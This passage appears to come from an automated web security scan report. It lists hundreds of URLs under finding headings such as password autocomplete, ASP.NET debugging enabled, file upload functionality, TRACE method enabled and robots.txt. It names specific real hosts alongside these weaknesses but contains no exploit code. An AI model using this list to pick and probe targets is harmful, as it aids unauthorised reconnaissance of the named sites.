7.323. http://lilypad-cdn.cranberry.com/img/d6364566-fb9d-4ddf-849b-16d264dabff6/60/fernleynews.jpg

7.324. http://lilypad-cdn.cranberry.com/img/d9d8a566-1e7c-462c-86b0-4303e44608b2/60/vois.jpg

7.325. http://lilypad-cdn.cranberry.com/img/e7c5104e-5c43-4d89-8e90-7c463f837121/60/stevenwyer.jpg

7.326. http://lilypad-cdn.cranberry.com/img/e846f474-057b-4233-9640-0e2f0b1f112a/60/katewalling.jpg

7.327. http://lilypad-cdn.cranberry.com/img/f3629ed1-6277-428b-9e8a-e8456fd83831/60/scouthomestaging.jpg

7.328. http://lilypad-cdn.cranberry.com/img/fdb40132-b27e-4150-a8ca-1d4473987cdc/60/affiliatetip.jpg

7.329. http://lilypad-cdn.cranberry.com/img/fe936a40-7d28-4120-ad40-ba37b97b26f1/60/otrtiresupply.jpg

7.330. http://lilypad.cranberry.com/css/osxModal.css

7.331. http://lilypad.cranberry.com/js/jquery.simplemodal-1.3.3.min.js

7.332. http://lilypad.cranberry.com/js/osxModal.js

7.333. http://lilypad.cranberry.com/person/new

7.334. http://load.exelator.com/load/

7.335. http://loadm.exelator.com/load/

7.336. https://login.live.com/login.srf

7.337. https://login.live.com/ppsecure/post.srf

7.338. https://login.oracle.com/favicon.ico

7.339. https://login.oracle.com/mysso/signon.jsp

7.340. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

7.341. https://login.oracle.com/sso/auth

7.342. https://login.oracle.com/sso_loginui/feed-icon-14x14.png

7.343. https://login.oracle.com/sso_loginui/go_button.gif

7.344. https://login.oracle.com/sso_loginui/hp_spacer.gif

7.345. https://login.oracle.com/sso_loginui/moc_lib.js

7.346. https://login.oracle.com/sso_loginui/oracle.css

7.347. https://login.oracle.com/sso_loginui/oralogo_small.gif

7.348. https://login.oracle.com/sso_loginui/sso_check.js

7.349. http://maps.google.com/maps

7.350. http://maps.google.com/maps/gen_204

7.351. http://maps.google.com/maps/nav

7.352. http://maps.google.com/maps/vp

7.353. https://mix.oracle.com/

7.354. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx

7.355. http://networksolutions.112.2o7.net/b/ss/netsolglobal/1/H.21.1/s14008630060125

7.356. http://networksolutions.112.2o7.net/b/ss/netsolglobal/1/H.21.1/s19329686376731

7.357. http://now.eloqua.com/visitor/v200/svrGP.aspx

7.358. http://odb.outbrain.com/utils/get

7.359. http://odb.outbrain.com/utils/get

7.360. http://odb.outbrain.com/utils/get

7.361. http://odb.outbrain.com/utils/get

7.362. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s53765518721193

7.363. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s55347714372910

7.364. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s55552479997

7.365. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s56072562700137

7.366. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleotnlive/1/H.19.4/s58862111601047

7.367. http://peoplepond.com/

7.368. http://peoplepond.com/_mint/

7.369. http://peoplepond.com/favicon.ico

7.370. http://pix04.revsci.net/D10889/b3/0/3/noscript.gif

7.371. http://pix04.revsci.net/D10889/b3/0/3/noscript.gif

7.372. http://pixel.quantserve.com/pixel

7.373. http://pixel.rubiconproject.com/tap.php

7.374. http://plancast.com/p/3zbp

7.375. https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx

7.376. http://r.turn.com/r/bd

7.377. http://r1-ads.ace.advertising.com/site=743260/size=300250/u=2/bnum=73260642/xsxdata=1:93182371/hr=11/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.winamp.com%252F

7.378. http://safebrowsing.clients.google.com/safebrowsing/downloads

7.379. http://safebrowsing.clients.google.com/safebrowsing/gethash

7.380. http://segment-pixel.invitemedia.com/pixel

7.381. http://segment-pixel.invitemedia.com/set_partner_uid

7.382. http://segment-pixel.invitemedia.com/unpixel

7.383. http://segments.adap.tv/data

7.384. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543557/sid.6543551/sid.6543598

7.385. http://server.iad.liveperson.net/hc/43040610/

7.386. http://server.iad.liveperson.net/hc/43040610/

7.387. http://server.iad.liveperson.net/hc/43040610/

7.388. http://stats.cafepress.com/b/ss/cafepresscom/1/H.2-pdv-2/s34579009918961

7.389. http://stats.manticoretechnology.com/Data/447/7993/AD0FEDA3-8777-48C4-97A7-A1999E9FA90D/mtcLogData.asp

7.390. http://tacoda.at.atwola.com/rtx/r.js

7.391. http://tags.bluekai.com/site/918

7.392. http://tags.crwdcntrl.net/5/c=244/b=2252612

7.393. http://tags.crwdcntrl.net/5/c=244/b=2252618

7.394. http://tags.crwdcntrl.net/5/c=244/b=2253465

7.395. http://tags.crwdcntrl.net/5/c=25/b=1225394

7.396. http://tags.crwdcntrl.net/5/c=25/b=1225400

7.397. http://tags.crwdcntrl.net/5/c=25/b=1226041

7.398. http://telligent.com/

7.399. http://telligent.com/Custom/Images/ajax-spinner-circle.gif

7.400. http://telligent.com/Custom/Scripts/FormUtils.js

7.401. http://telligent.com/Custom/Scripts/SearchPhraseManager.js

7.402. http://telligent.com/CustomFooterFragments/scripts/jquery.jfeed.pack.js

7.403. http://telligent.com/SyntaxHighlighter/scripts/shAutoloader.js

7.404. http://telligent.com/SyntaxHighlighter/scripts/shCore.js

7.405. http://telligent.com/SyntaxHighlighter/styles/shCore.css

7.406. http://telligent.com/SyntaxHighlighter/styles/shThemeDefault.css

7.407. http://telligent.com/Themes/Custom/Images/spacer.gif

7.408. http://telligent.com/Themes/Custom/images/icon-email-white.gif

7.409. http://telligent.com/Themes/Custom/images/logo-ta-med.png

7.410. http://telligent.com/Themes/Custom/images/logo-tc-med.png

7.411. http://telligent.com/Themes/Custom/images/logo-te-med.png

7.412. http://telligent.com/Themes/Custom/images/partners-page-learnmore-background.png

7.413. http://telligent.com/Themes/Custom/images/products-page-logo-tc.png

7.414. http://telligent.com/Utility/ContentFragments/CMS/ContentMenu.js

7.415. http://telligent.com/Utility/ContentFragments/CMS/ContentMenuAjax.asmx

7.416. http://telligent.com/Utility/FooterFragments/Core/UserInfoPopup.js

7.417. http://telligent.com/Utility/FooterFragments/Core/UserInfoPopupAjax.asmx

7.418. http://telligent.com/Utility/HeaderFragments/CMS/suckerfish.css

7.419. http://telligent.com/Utility/HeaderFragments/CMS/suckerfish.js

7.420. http://telligent.com/Utility/HeaderFragments/Core/GroupNavigation.js

7.421. http://telligent.com/Utility/HeaderFragments/Core/GroupNavigationAjax.asmx

7.422. http://telligent.com/Utility/HeaderFragments/Core/Search.js

7.423. http://telligent.com/Utility/HeaderFragments/Core/SearchAjax.asmx

7.424. http://telligent.com/WebResource.axd

7.425. http://telligent.com/analytics.ashx

7.426. http://telligent.com/cfs-file.ashx/__key/CommunityServer.Components.SiteFiles/TelligentLogo.png

7.427. http://telligent.com/community/

7.428. http://telligent.com/company/

7.429. http://telligent.com/company/careers/

7.430. http://telligent.com/company/community_commitment/

7.431. http://telligent.com/company/contact_us.aspx

7.432. http://telligent.com/company/contact_us/

7.433. http://telligent.com/company/leadership/

7.434. http://telligent.com/company/news/

7.435. http://telligent.com/company/news/b/articles/archive/2011/01/17/cmswire-mobile-experience-a-key-requirement-for-communities.aspx

7.436. http://telligent.com/company/news/b/articles/archive/2011/02/17/telligent-integrates-with-sharepoint-2010.aspx

7.437. http://telligent.com/company/news/b/press_releases/archive/2011/02/10/new-customers-and-strong-demand-for-social-community-software-fuel-telligent-s-record-breaking-sales-quarter.aspx

7.438. http://telligent.com/company/news/b/press_releases/archive/2011/02/15/telligent-releases-integration-with-microsoft-sharepoint-2010.aspx

7.439. http://telligent.com/company/news/b/teamblog/

7.440. http://telligent.com/company/news/b/teamblog/archive/2011/02/10/new-customers-and-strong-demand-for-social-community-software-fuel-telligent-s-record-breaking-sales-quarter.aspx

7.441. http://telligent.com/customers.aspx

7.442. http://telligent.com/customers/

7.443. http://telligent.com/elqNow/elqCfg.js

7.444. http://telligent.com/elqNow/elqImg.js

7.445. http://telligent.com/elqNow/elqScr.js

7.446. http://telligent.com/files/media/image/buttons/RequestDemoBtn.png

7.447. http://telligent.com/files/media/image/buttons/RfpBtn.png

7.448. http://telligent.com/files/media/image/buttons/TC-UpgradeBtn-56.png

7.449. http://telligent.com/files/media/image/products/community/social-ecosystem-tc-sb2.png

7.450. http://telligent.com/files/media/image/products/community/tc-people.png

7.451. http://telligent.com/files/media/image/promos/Forrester-Promo-Best-Practices-Social-Technologies-250.png

7.452. http://telligent.com/files/media/image/promos/Forrester-Promo-Intercompany-collab-250.png

7.453. http://telligent.com/files/media/image/promos/btn-seehow-readersdig.png

7.454. http://telligent.com/files/media/image/quotes/quotes-readersdig.png

7.455. http://telligent.com/login.aspx

7.456. http://telligent.com/members/vinceford/activities/followersrss.aspx

7.457. http://telligent.com/members/vinceford/activities/groupsrss.aspx

7.458. http://telligent.com/members/vinceford/activities/rss.aspx

7.459. http://telligent.com/members/vinceford/comments/rss.aspx

7.460. http://telligent.com/partners/

7.461. http://telligent.com/privacy_policy.aspx

7.462. http://telligent.com/products/

7.463. http://telligent.com/products/request_a_demo.aspx

7.464. http://telligent.com/products/telligent_analytics/

7.465. http://telligent.com/products/telligent_enterprise/

7.466. http://telligent.com/resources/

7.467. http://telligent.com/resources/m/analysts/1343205.aspx

7.468. http://telligent.com/resources/m/analysts/1345217.aspx

7.469. http://telligent.com/resources/m/success_stories/1331597.aspx

7.470. http://telligent.com/resources/m/white_papers/

7.471. http://telligent.com/rss.aspx

7.472. http://telligent.com/services/

7.473. http://telligent.com/support/

7.474. http://telligent.com/support/analytics/

7.475. http://telligent.com/support/communityserver/

7.476. http://telligent.com/support/csevolution/

7.477. http://telligent.com/support/harvest/

7.478. http://telligent.com/support/request_an_upgrade/

7.479. http://telligent.com/support/telligent_evolution_platform/

7.480. http://telligent.com/support/telligent_evolution_platform/community/

7.481. http://telligent.com/support/telligent_evolution_platform/enterprise/

7.482. http://telligent.com/support/telligent_evolution_platform/w/documentation/

7.483. http://telligent.com/terms_of_use.aspx

7.484. http://telligent.com/themes/Custom/images/background.png

7.485. http://telligent.com/themes/Custom/images/footer-background.png

7.486. http://telligent.com/themes/Custom/images/icon-phone-white.png

7.487. http://telligent.com/themes/Custom/images/menu-tabs-background-right-corner.png

7.488. http://telligent.com/themes/Custom/images/menu-tabs-background.gif

7.489. http://telligent.com/themes/Custom/images/search-background.png

7.490. http://telligent.com/themes/Custom/images/tab-selected-home.png

7.491. http://telligent.com/themes/cms/fiji/css/DynamicStyle.aspx

7.492. http://telligent.com/themes/cms/fiji/css/fourroads-cms.css

7.493. http://telligent.com/themes/cms/fiji/css/screen.css

7.494. http://telligent.com/themes/fiji/css/base.css

7.495. http://telligent.com/themes/fiji/css/content-fragments-core.css

7.496. http://telligent.com/themes/fiji/css/content-fragments-forums.css

7.497. http://telligent.com/themes/fiji/css/content-fragments-groups.css

7.498. http://telligent.com/themes/fiji/css/content-fragments-marketplace.css

7.499. http://telligent.com/themes/fiji/css/content-fragments-mediagalleries.css

7.500. http://telligent.com/themes/fiji/css/content-fragments-messages.css

7.501. http://telligent.com/themes/fiji/css/content-fragments-weblogs.css

7.502. http://telligent.com/themes/fiji/css/content-fragments-wikis.css

7.503. http://telligent.com/themes/fiji/css/content-fragments.css

7.504. http://telligent.com/themes/fiji/css/custom.css

7.505. http://telligent.com/themes/fiji/css/footer-fragments.css

7.506. http://telligent.com/themes/fiji/css/fourroads-cms.css

7.507. http://telligent.com/themes/fiji/css/header-fragments.css

7.508. http://telligent.com/themes/fiji/css/print.css

7.509. http://telligent.com/themes/fiji/css/screen.css

7.510. http://telligent.com/themes/fiji/favicon.ico

7.511. http://telligent.com/themes/fiji/images/group-nav-bkg.gif

7.512. http://telligent.com/themes/fiji/images/group-nav-sep.gif

7.513. http://telligent.com/themes/generic/css/layout.css

7.514. http://telligent.com/themes/groups/fiji/css/DynamicStyle.aspx

7.515. http://telligent.com/utility/jquery/jquery-1.3.2.min.js

7.516. http://telligent.com/utility/loading.htm

7.517. http://trafficshaping.com/

7.518. http://trafficshaping.com/favicon.ico

7.519. http://trafficshaping.com/seo-tools

7.520. http://translate.google.com/translate_a/element.js

7.521. http://translate.googleapis.com/translate_a/l

7.522. http://twitter.com/favorites/tap11.json

7.523. http://twitter.com/watchmouse/status/35359711327031296

7.524. https://twitter.com/oauth/authenticate

7.525. http://REDACTED/iaction/00asup_HomePortal_1

7.526. http://widgets.causes.com/badges/cause

7.527. http://wstat.wibiya.com/l.jpg

7.528. http://www.adexchanger.com/email/liveintent/

7.529. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

7.530. http://www.bizographics.com/collect/

7.531. http://www.blogger.com/reviews/json/aggregates

7.532. http://www.cafepress.com/duckduckgo

7.533. http://www.companypond.com/

7.534. http://www.freefind.com/

7.535. http://www.google.com/

7.536. http://www.google.com/aclk

7.537. http://www.google.com/gen_204

7.538. http://www.google.com/search

7.539. http://www.googleadservices.com/pagead/aclk

7.540. http://www.networksolutions.com/css/gzip_1117039583/bundles/template.css

7.541. http://www.networksolutions.com/css/gzip_1497930774/bundles/domain-index.css

7.542. http://www.networksolutions.com/css/gzip_1721580421/css/print.css

7.543. http://www.networksolutions.com/css/gzip_792199742/css/lib/plugins/jquery/thickbox.css

7.544. http://www.networksolutions.com/css/gzip_N1611004770/bundles/ns0.css

7.545. http://www.networksolutions.com/css/gzip_N935989521/bundles/domain-search-results-default.css

7.546. http://www.networksolutions.com/js/gzip_1519484056/js/utils/LivePerson-mtagconfig.js

7.547. http://www.networksolutions.com/js/gzip_1706295218/bundles/omniture.js

7.548. http://www.networksolutions.com/js/gzip_N1134831222/js/lib/jquery/plugins/thickbox.js

7.549. http://www.networksolutions.com/js/gzip_N1436114336/bundles/seoforecom.js

7.550. http://www.networksolutions.com/js/gzip_N2081288211/bundles/domain-name-search-results.js

7.551. http://www.networksolutions.com/js/gzip_N766518311/bundles/domain-main.js

7.552. http://www.networksolutions.com/js/gzip_N844206633/bundles/template.js

7.553. http://www.networksolutions.com/js/gzip_N85535608/bundles/ns0.js

7.554. http://www.oracle.com/pls/www/go.lp

7.555. http://www.project-syndicate.org/create_captcha

7.556. http://www.stowetel.net/favicon.ico

7.557. http://www.trafficshaping.com/_mint/

7.558. http://www.virtusa.com/aboutus/advisory-board.asp

7.559. http://www.virtusa.com/aboutus/awards-and-certifications.asp

7.560. http://www.virtusa.com/aboutus/company-overview.asp

7.561. http://www.virtusa.com/aboutus/management-board.asp

7.562. http://www.virtusa.com/aboutus/our-offices.asp

7.563. http://www.virtusa.com/aboutus/why-virtusa.asp

7.564. http://www.virtusa.com/applications/userlogin/freedownload.asp

7.565. http://www.virtusa.com/btrc/default.asp

7.566. http://www.virtusa.com/careers/campus-reach-initiative.asp

7.567. http://www.virtusa.com/careers/open-positions.asp

7.568. http://www.virtusa.com/careers/our-values.asp

7.569. http://www.virtusa.com/careers/why-virtusa.asp

7.570. http://www.virtusa.com/careers/work-environment.asp

7.571. http://www.virtusa.com/clients/

7.572. http://www.virtusa.com/contactus/

7.573. http://www.virtusa.com/default.asp

7.574. http://www.virtusa.com/ftbu/

7.575. http://www.virtusa.com/ftbu/aboutus/default.asp

7.576. http://www.virtusa.com/ftbu/aboutus/our-offices.asp

7.577. http://www.virtusa.com/ftbu/careers/default.asp

7.578. http://www.virtusa.com/ftbu/contactus/default.asp

7.579. http://www.virtusa.com/ftbu/default.asp

7.580. http://www.virtusa.com/ftbu/newsroom/article.asp

7.581. http://www.virtusa.com/ftbu/newsroom/default.asp

7.582. http://www.virtusa.com/ftbu/ouradvantage/business-insight.asp

7.583. http://www.virtusa.com/ftbu/ouradvantage/methodology.asp

7.584. http://www.virtusa.com/ftbu/ouradvantage/technologies.asp

7.585. http://www.virtusa.com/ftbu/ourclients/client-list.asp

7.586. http://www.virtusa.com/ftbu/privacy-statement.asp

7.587. http://www.virtusa.com/ftbu/search/result.asp

7.588. http://www.virtusa.com/ftbu/services/business_process/business-intelligence.asp

7.589. http://www.virtusa.com/ftbu/services/business_process/claims-management.asp

7.590. http://www.virtusa.com/ftbu/services/business_process/commissions-management.asp

7.591. http://www.virtusa.com/ftbu/services/business_process/consolidation.asp

7.592. http://www.virtusa.com/ftbu/services/business_process/default.asp

7.593. http://www.virtusa.com/ftbu/services/business_process/integrated-process-modeling.asp

7.594. http://www.virtusa.com/ftbu/services/business_process/management-accounting.asp

7.595. http://www.virtusa.com/ftbu/services/business_process/payment-processes.asp

7.596. http://www.virtusa.com/ftbu/services/business_process/policy-management.asp

7.597. http://www.virtusa.com/ftbu/services/implementation-method/business-engineering.asp

7.598. http://www.virtusa.com/ftbu/services/implementation-method/change-management.asp

7.599. http://www.virtusa.com/ftbu/services/implementation-method/default.asp

7.600. http://www.virtusa.com/ftbu/services/implementation-method/project-management.asp

7.601. http://www.virtusa.com/ftbu/services/implementation-method/quality-management.asp

7.602. http://www.virtusa.com/ftbu/services/implementation-method/software-selection.asp

7.603. http://www.virtusa.com/ftbu/services/technology/default.asp

7.604. http://www.virtusa.com/ftbu/services/technology/industries/default.asp

7.605. http://www.virtusa.com/ftbu/services/technology/industries/sap-is-t-rm-ca.asp

7.606. http://www.virtusa.com/ftbu/services/technology/industries/sap-is-u.asp

7.607. http://www.virtusa.com/ftbu/services/technology/industries/sap-ps-cd.asp

7.608. http://www.virtusa.com/ftbu/services/technology/industries/sap-trm.asp

7.609. http://www.virtusa.com/ftbu/services/technology/insurance/default.asp

7.610. http://www.virtusa.com/ftbu/services/technology/insurance/sap-alice.asp

7.611. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-cd.asp

7.612. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-cm.asp

7.613. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-icm.asp

7.614. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-pm.asp

7.615. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-ri.asp

7.616. http://www.virtusa.com/ftbu/services/technology/integration-sap-non-sap.asp

7.617. http://www.virtusa.com/ftbu/services/technology/maintenance.asp

7.618. http://www.virtusa.com/ftbu/services/technology/system-migration.asp

7.619. http://www.virtusa.com/ftbu/services/technology/upgrades.asp

7.620. http://www.virtusa.com/ftbu/sitemap.asp

7.621. http://www.virtusa.com/ftbu/terms-conditions.asp

7.622. http://www.virtusa.com/industries/banking-financial-services/

7.623. http://www.virtusa.com/industries/communications/

7.624. http://www.virtusa.com/industries/high-technology/

7.625. http://www.virtusa.com/industries/independent-software-vendors/

7.626. http://www.virtusa.com/industries/insurance/

7.627. http://www.virtusa.com/industries/media-information-entertainment/

7.628. http://www.virtusa.com/industries/pharmaceuticals/

7.629. http://www.virtusa.com/investors/SEC_filings.asp

7.630. http://www.virtusa.com/investors/annual_report_and_proxy_statement.asp

7.631. http://www.virtusa.com/investors/corporate_governance.asp

7.632. http://www.virtusa.com/investors/default.asp

7.633. http://www.virtusa.com/investors/investor_contact.asp

7.634. http://www.virtusa.com/investors/stock_information.asp

7.635. http://www.virtusa.com/newsroom/article.asp

7.636. http://www.virtusa.com/newsroom/default.asp

7.637. http://www.virtusa.com/newsroom/events.asp

7.638. http://www.virtusa.com/newsroom/in-the-media.asp

7.639. http://www.virtusa.com/newsroom/press-releases.asp

7.640. http://www.virtusa.com/platforming/overview.asp

7.641. http://www.virtusa.com/platforming/platforming-best-practices.asp

7.642. http://www.virtusa.com/platforming/why-platforming.asp

7.643. http://www.virtusa.com/practices/bpm/

7.644. http://www.virtusa.com/practices/bpm/default.asp

7.645. http://www.virtusa.com/practices/dwbi/

7.646. http://www.virtusa.com/practices/dwbi/center-of-excellence/default.asp

7.647. http://www.virtusa.com/practices/dwbi/default.asp

7.648. http://www.virtusa.com/practices/dwbi/service-offerings/default.asp

7.649. http://www.virtusa.com/practices/dwbi/technology-and-alliances/default.asp

7.650. http://www.virtusa.com/practices/ecm/

7.651. http://www.virtusa.com/practices/ecm/default.asp

7.652. http://www.virtusa.com/practices/software-testing/

7.653. http://www.virtusa.com/practices/software-testing/core-testing/default.asp

7.654. http://www.virtusa.com/practices/software-testing/default.asp

7.655. http://www.virtusa.com/practices/software-testing/test-consultancy/default.asp

7.656. http://www.virtusa.com/practices/software-testing/tools-expertise.asp

7.657. http://www.virtusa.com/privacy-statement.asp

7.658. http://www.virtusa.com/resources/agile-software-development.asp

7.659. http://www.virtusa.com/resources/application-consolidation.asp

7.660. http://www.virtusa.com/resources/application-development-services.asp

7.661. http://www.virtusa.com/resources/application-rationalization.asp

7.662. http://www.virtusa.com/resources/automated-software-test.asp

7.663. http://www.virtusa.com/resources/business-technology-services.asp

7.664. http://www.virtusa.com/resources/custom-software-development.asp

7.665. http://www.virtusa.com/resources/development-outsourcing.asp

7.666. http://www.virtusa.com/resources/it-application-maintenance.asp

7.667. http://www.virtusa.com/resources/it-consolidation.asp

7.668. http://www.virtusa.com/resources/it-consulting-company.asp

7.669. http://www.virtusa.com/resources/it-consulting-outsourcing.asp

7.670. http://www.virtusa.com/resources/it-consulting-services.asp

7.671. http://www.virtusa.com/resources/it-offshoring.asp

7.672. http://www.virtusa.com/resources/lean-it.asp

7.673. http://www.virtusa.com/resources/offshore-development.asp

7.674. http://www.virtusa.com/resources/offshore-outsourcing-services.asp

7.675. http://www.virtusa.com/resources/outsource-software-development.asp

7.676. http://www.virtusa.com/resources/outsourcing-services.asp

7.677. http://www.virtusa.com/resources/performance-testing-tools.asp

7.678. http://www.virtusa.com/resources/software-development-company.asp

7.679. http://www.virtusa.com/resources/software-outsourcing-company.asp

7.680. http://www.virtusa.com/resources/software-test-automation.asp

7.681. http://www.virtusa.com/resources/software-test-management.asp

7.682. http://www.virtusa.com/resources/technology-outsourcing.asp

7.683. http://www.virtusa.com/rssfeeds/default.asp

7.684. http://www.virtusa.com/search/result.asp

7.685. http://www.virtusa.com/services/application-development/

7.686. http://www.virtusa.com/services/consulting/

7.687. http://www.virtusa.com/services/legacy-asset-management/

7.688. http://www.virtusa.com/services/product-development/

7.689. http://www.virtusa.com/sitemap.asp

7.690. http://www.virtusa.com/terms-conditions.asp

8. Password field with autocomplete enabled

8.1. https://accounts.zoho.com/login

8.2. https://accounts.zoho.com/register

8.3. http://bad-behavior.ioerror.us/wp-login.php

8.4. http://bnxs.com/

8.5. http://bnxs.com/how-to-start-your-own-url-shortening-service/

8.6. http://bnxs.com/wp-includes/js/tinymce/plugins/wordpress/wordpress.css

8.7. https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_us/-/USD/ViewProductDetail-Start

8.8. https://client.trafficshaping.com/signin

8.9. http://dev.qwerly.com/member/register

8.10. http://forums.winamp.com/

8.11. http://forums.winamp.com/forumdisplay.php

8.12. http://forums.winamp.com/login.php

8.13. http://hootsuite.com/

8.14. http://lilypad.cranberry.com/person/new

8.15. http://lilypad.cranberry.com/person/new

8.16. https://login.silverlight.net/login/signin.aspx

8.17. http://mail.ioerror.us/mailman/listinfo/bad-behavior

8.18. http://mail.ioerror.us/mailman/listinfo/bad-behavior

8.19. http://mail.ioerror.us/mailman/listinfo/bad-behavior-announce

8.20. http://mail.ioerror.us/mailman/listinfo/bad-behavior-announce

8.21. https://shop.winamp.com/store

8.22. http://telligent.com/login.aspx

8.23. http://telligent.com/login.aspx

8.24. http://trafficshaping.com/

8.25. https://twitter.com/oauth/authenticate

8.26. http://www.capgemini.com/registration/register/

8.27. https://www.fusionbot.com/login.asp

8.28. http://www.project-syndicate.org/

8.29. http://www.project-syndicate.org/commentary/ashour1/English

8.30. http://www.project-syndicate.org/commentary/ashour1/English

8.31. http://www.project-syndicate.org/commentary/fischer60/English

8.32. http://www.project-syndicate.org/commentary/fischer60/English

8.33. http://www.project-syndicate.org/contributor/1608

8.34. http://www.project-syndicate.org/contributor/886

8.35. http://www.project-syndicate.org/register

8.36. http://www.project-syndicate.org/register

8.37. http://www.project-syndicate.org/series/finance_in_the_21st_century/description

8.38. http://www.project-syndicate.org/series_metacategory/1

8.39. http://www.project-syndicate.org/series_metacategory/3

8.40. http://www.sitelevel.com/

8.41. http://www.watchmouse.com/en/

8.42. http://www.watchmouse.com/en/

8.43. http://www.watchmouse.com/en/contact.php

8.44. http://www.watchmouse.com/en/plans_price.php

9. ASP.NET debugging enabled

9.1. http://usage.apps.conduit-services.com/Default.aspx

9.2. http://www.leadlife.com/Default.aspx

9.3. http://www.sti-world.com/Default.aspx

10. File upload functionality

10.1. http://jigsaw.w3.org/css-validator/

10.2. http://sstatic.net/Js/wmd.js

11. TRACE method is enabled

11.1. http://adam.companypond.com/

11.2. http://b.aol.com/

11.3. http://b.winamp.com/

11.4. http://blog.qwerly.com/

11.5. http://capgeminicom.112.2o7.net/

11.6. http://capgeminicomglobal.112.2o7.net/

11.7. https://client.trafficshaping.com/

11.8. http://companypond.com/

11.9. http://creativecommons.org/

11.10. http://forums.winamp.com/

11.11. http://image2.pubmatic.com/

11.12. http://jigsaw.w3.org/

11.13. http://lilypad-cdn.cranberry.com/

11.14. http://lilypad.cranberry.com/

11.15. https://login.oracle.com/

11.16. http://mail.ioerror.us/

11.17. https://mix.oracle.com/

11.18. http://networksolutions.112.2o7.net/

11.19. http://o.sa.aol.com/

11.20. http://peoplepond.com/

11.21. http://referrals.fusionbot.com/

11.22. http://segs.btrll.com/

11.23. http://statistics.wibiya.com/

11.24. http://tacoda.at.atwola.com/

11.25. http://tetlaw.id.au/

11.26. http://widgets.digg.com/

11.27. http://wstat.wibiya.com/

11.28. http://www.companypond.com/

11.29. http://www.cranberryventurepartners.com/

11.30. http://www.fusionbot.com/

11.31. https://www.fusionbot.com/

11.32. http://www.opengroup.org/

11.33. http://www.sti-seoservices.com/

12. Robots.txt file

12.1. http://ads.undertone.com/afr.php

12.2. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0

12.3. http://api.qwerly.com/v1/facebook/username/someone

12.4. http://api.search.live.net/json.aspx

12.5. http://ar.atwola.com/atd

12.6. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125

12.7. http://blog.qwerly.com/

12.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs

12.9. http://capgeminicom.112.2o7.net/crossdomain.xml

12.10. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s96224887147545

12.11. http://cdn.cloudscan.us/

12.12. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

12.13. http://cloudscan.us/

12.14. http://cm.g.doubleclick.net/pixel

12.15. http://code.google.com/p/swfobject/

12.16. http://creativecommons.org/licenses/by-sa/2.5/

12.17. http://cspix.media6degrees.com/orbserv/hbpix

12.18. http://dev.qwerly.com/

12.19. http://developer.klout.com/

12.20. http://discuss.zoho.com/getCustomFile.do

12.21. http://drh.img.digitalriver.com/store

12.22. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_4_5_18/StdBanner.js

12.23. http://duck.co/jsp/i18nConstants.jsp

12.24. https://duckduckgo.com/e.js

12.25. http://edge.quantserve.com/quant.js

12.26. https://event.on24.com/eventRegistration/EventLobbyServlet

12.27. http://forums.winamp.com/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js

12.28. http://go.microsoft.com/fwlink/

12.29. http://i2.duck.co/i/sports.espn.go.com.ico

12.30. http://jigsaw.w3.org/css-validator/

12.31. http://klout.com/

12.32. http://linkhelp.clients.google.com/tbproxy/lh/fixurl

12.33. http://loadm.exelator.com/load/

12.34. https://login.live.com/pp1000/CSS/WEBwhitegray1033.css

12.35. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

12.36. http://networksolutions.112.2o7.net/b/ss/netsolglobal/1/H.21.1/s19329686376731

12.37. http://now.eloqua.com/visitor/v200/svrGP.aspx

12.38. http://o.sa.aol.com/b/ss/aoltechcrunch,aolsvc/1/H.21/s68993670598138

12.39. http://qwerly.com/

12.40. http://s.gravatar.com/js/gprofiles.js

12.41. http://s0.wp.com/wp-content/themes/h4/global.css

12.42. http://s1.wp.com/wp-includes/js/jquery/jquery.js

12.43. http://s2.wp.com/wp-content/themes/vip/tctechcrunch/style.css

12.44. http://s7.addthis.com/js/250/addthis_widget.js

12.45. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY-OUCIPzlAjIF-LIAAB8

12.46. http://safebrowsing.clients.google.com/safebrowsing/downloads

12.47. http://services.winamp.com/ivw/get

12.48. http://shop.winamp.com/store

12.49. https://shop.winamp.com/store

12.50. http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/lqIx_MUkbGi.css

12.51. http://static02.linkedin.com/scds/common/u/img/sprite/sprite_connect_v6.png

12.52. http://statistics.wibiya.com/SetToolbarLoad.php

12.53. http://tags.crwdcntrl.net/5/c=25/b=1225400

12.54. http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/

12.55. http://telligent.com/products/telligent_community/

12.56. http://tetlaw.id.au/view/blog/prototype-class-fastinit/

12.57. http://tools.google.com/service/update2

12.58. http://translate.googleapis.com/translate_a/l

12.59. https://twitter.com/oauth/authenticate
